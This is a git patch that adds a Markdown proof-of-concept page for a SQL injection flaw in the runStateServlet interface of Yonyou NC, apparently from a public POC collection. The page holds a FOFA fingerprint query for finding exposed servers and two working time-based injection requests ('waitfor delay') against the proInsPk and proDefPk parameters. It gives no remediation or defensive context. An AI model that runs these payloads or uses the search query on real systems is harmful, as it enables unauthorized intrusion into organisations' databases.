From 80042f9f89a2370ca1b6882a0bd075158e25c6cc Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 10 Apr 2024 19:53:27 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BNC-runStateServlet?= =?UTF-8?q?=E6=8E=A5=E5=8F=A3=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 用友NC-runStateServlet接口存在SQL注入漏洞.md | 30 ++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 用友NC-runStateServlet接口存在SQL注入漏洞.md diff --git a/用友NC-runStateServlet接口存在SQL注入漏洞.md b/用友NC-runStateServlet接口存在SQL注入漏洞.md new file mode 100644 index 0000000..935f138 --- /dev/null +++ b/用友NC-runStateServlet接口存在SQL注入漏洞.md @@ -0,0 +1,30 @@ +## 用友NC-runStateServlet接口存在SQL注入漏洞 + + +## fofa +``` +icon_hash="1085941792" +``` + + +## poc +``` +GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proInsPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1 +Host: 192.168.63.129:8088 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 19 + +``` + + +## poc2 +``` +GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1 +Host: 192.168.63.129:8088 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 19 +``` + +![image](https://github.com/wy876/POC/assets/139549762/fe20943d-db7b-4a6e-85c1-b259e410f0ac)